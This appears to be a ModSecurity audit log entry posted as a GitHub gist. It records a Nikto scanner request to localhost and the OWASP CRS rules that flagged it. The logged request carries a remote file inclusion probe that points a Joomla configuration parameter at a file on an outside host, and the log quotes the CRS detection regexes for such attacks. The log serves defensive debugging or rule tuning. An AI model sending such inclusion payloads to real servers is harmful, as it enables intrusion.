Created
January 27, 2016 12:59
-
-
Save zimmerle/1dc7db6c2ce096bd068c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --89a3fd2c-A-- | |
| [13/Jan/2016:08:04:36 --0300] VpYvRH8AAQEAAF-yfRIAAAAA 127.0.0.1 34506 127.0.0.1 80 | |
| --89a3fd2c-B-- | |
| GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://cirt.net/rfiinc.txt? HTTP/1.1 | |
| Connection: Keep-Alive | |
| User-Agent: Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:005057) | |
| Host: localhost | |
| --89a3fd2c-F-- | |
| HTTP/1.1 200 OK | |
| Vary: Cookie | |
| Set-Cookie: testcookie | |
| Access-Control-Allow-Origin: * | |
| Keep-Alive: timeout=5, max=48 | |
| Connection: Keep-Alive | |
| Transfer-Encoding: chunked | |
| Content-Type: text/html; charset=UTF-8 | |
| --89a3fd2c-E-- | |
| --89a3fd2c-H-- | |
| Message: Warning. Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "GET"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] | |
| Message: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "47"] [id "960015"] [rev "1"] [msg "Request Missing an Accept Header"] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] | |
| Message: Warning. Match of "within %{tx.allowed_http_versions}" against "REQUEST_PROTOCOL" required. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_30_http_policy.conf"] [line "78"] [id "960034"] [rev "2"] [msg "HTTP protocol version is not allowed by policy"] [data "HTTP/1.1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/PROTOCOL_NOT_ALLOWED"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.10"] | |
| Message: Warning. Matched phrase "nikto" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "20"] [id "990002"] [rev "2"] [msg "Request Indicates a Security Scanner Scanned the Site"] [data "mozilla/5.00 (nikto/2.1.5) (evasions:none) (test:005057)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] | |
| Message: Warning. Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Nikto"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] | |
| Message: Warning. Pattern match "(?i:(\\binclude\\s*\\([^)]*|mosConfig_absolute_path|_CONF\\[path\\]|_SERVER\\[DOCUMENT_ROOT\\]|GALLERY_BASEDIR|path\\[docroot\\]|appserv_root|config\\[root_dir\\])=(ht|f)tps?:\\/\\/)" at QUERY_STRING. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "157"] [id "950118"] [rev "3"] [msg "Remote File Inclusion Attack"] [data "Matched Data: mosConfig_absolute_path=http:// found within QUERY_STRING: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] | |
| Message: Warning. Pattern match "^(?i)(?:ft|htt)ps?(.*?)\\?+$" at ARGS:mosConfig_absolute_path. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "160"] [id "950119"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://cirt.net/rfiinc.txt? found within ARGS:mosConfig_absolute_path: http://cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] | |
| Message: Warning. Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cirt.net/rfiinc.txt? found within TX:1: cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] | |
| Message: Warning. Operator GT matched 0 at TX. [file "/etc/modsecurity/owasp-v2/slr_rules/modsecurity_crs_46_slr_et_rfi_attacks.conf"] [line "1820"] [id "2008923"] [rev "3"] [msg "SLR: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion"] [data "http://cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [tag "web-application-attack"] [tag "bugtraq,32498"] | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s | |
| Apache-Handler: application/x-httpd-php | |
| Stopwatch: 1452683076134324 30129 (- - -) | |
| Stopwatch2: 1452683076134324 30129; combined=27956, p1=23125, p2=4699, p3=8, p4=57, p5=66, sr=38, sw=1, l=0, gc=0 | |
| Response-Body-Transformed: Dechunked | |
| Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/). | |
| Server: Apache/2.4.12 (Ubuntu) | |
| Engine-Mode: "ENABLED" | |
| --89a3fd2c-Z-- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment